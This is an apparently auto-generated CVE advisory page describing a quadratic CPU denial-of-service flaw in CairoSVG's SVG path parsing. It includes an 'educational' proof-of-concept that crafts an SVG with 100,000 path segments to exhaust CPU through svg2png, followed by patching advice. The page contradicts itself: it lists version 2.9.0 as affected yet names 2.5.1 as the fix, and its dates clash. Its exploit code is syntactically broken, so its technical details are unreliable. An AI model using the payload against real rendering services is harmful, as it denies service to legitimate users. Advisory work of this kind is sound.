CairoSVG, Quadratic CPU Denial of Service, CVE-2021-21236 (Medium) -DC-Oct2026-2945

Listen to this Post

The vulnerability resides within CairoSVG’s path rendering engine, specifically inside the `cairosvg/path.py` module where untrusted SVG path data is parsed and processed.
When an SVG document containing a `` element with an extremely high density of coordinate segments is rendered, the application suffers from severe quadratic time complexity ($O(n^2)$ CPU consumption).
This performance degradation is driven by two independent architectural bottlenecks in the source code.
First, the path-data tokenizer parses the attribute string using a continuous `while` loop that repeatedly slices and re-scans the remaining unparsed string substring.
Because each slicing iteration operates proportionally to the length of the remaining string, processing $n$ tokens across the entire attribute results in $O(n^2)$ complexity.
Second, the marker handling subsystem (draw_markers) processes node vertices by repeatedly invoking `node.vertices.pop(0)` inside a `while` loop.
In Python lists, popping the first element shifts all subsequent elements in memory, making a single `pop(0)` operation an $O(n)$ linear task.
Draining $n$ vertices sequentially using this method compounds the inefficiency, resulting in another distinct $O(n^2)$ bottleneck.
An unauthenticated attacker can easily leverage these compounding inefficiencies by constructing a malicious SVG file filled with hundreds of thousands of redundant path commands.
When a target service invokes public rendering APIs such as svg2png, svg2pdf, or `svg2ps` on this untrusted input, the CPU core handling the thread becomes entirely blocked.
Processing an input file under 1 MiB can lock up the rendering process for nearly twenty seconds of continuous 100% CPU utilization.
Any web application, microservice, or backend pipeline that automatically processes user-uploaded vector graphics for avatars, thumbnails, or document exports becomes an immediate target.
Repeated requests with such crafted payloads will exhaust server worker threads, leading to a complete Denial of Service (DoS) for legitimate users.
Mitigating this issue requires replacing string re-slicing with single forward-index scans or regular expression iterators, and substituting list pops with efficient data structures like collections.deque.popleft.

DailyCVE Form:

Platform: CairoSVG Python package
Version: Version 2.9.0
Vulnerability: Quadratic CPU Denial
Severity: Medium vulnerability level
date: January 6 2021

Prediction: Already patched upstream

What Undercode Say:

Analytics indicate that path-segment scaling exhibits strict quadratic growth where doubling input segments quadruples processing time.
Memory and CPU profiling confirm that sub-MiB SVG documents are sufficient to saturate single-core worker threads during thumbnail or PDF generation pipelines.

Bash Commands and Code:

pip install cairosvg==2.9.0
python3 -c "import cairosvg; cairosvg.svg2png(bytestring=b'<svg><path d=\"M0 0 L1 1\"/></svg>')"

Exploit: (Educational Purposes!)

import cairosvg
Crafting malicious payload with 100,000 path segments
d = "M0 0 " + "L1 1 " 100000
svg = f'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"><path d="{d}"/></svg>'
Triggering O(n^2) CPU exhaustion via svg2png rendering API
cairosvg.svg2png(bytestring=svg.encode())

Protection: from this CVE

Upgrade CairoSVG to a patched version (2.5.1 or later) where path tokenization uses efficient forward index scanning and vertex draining utilizes collections.deque.popleft. Additionally, implement strict input validation to cap maximum allowed path-segment counts and enforce resource timeouts on vector rendering tasks.

Impact:

Successful exploitation leads to unconstrained CPU resource exhaustion, server thread locking, and complete Denial of Service (DoS) for applications processing user-supplied SVG content.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top